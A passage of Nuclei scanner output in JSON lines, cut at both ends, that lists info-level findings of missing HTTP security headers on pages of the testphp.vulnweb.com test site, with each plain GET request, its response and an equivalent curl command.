Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.538457458Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.538522148Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.53854482Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.539988278Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.540032206Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.540065928Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.540096521Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.540124485Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.540152418Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.540179347Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.540205982Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 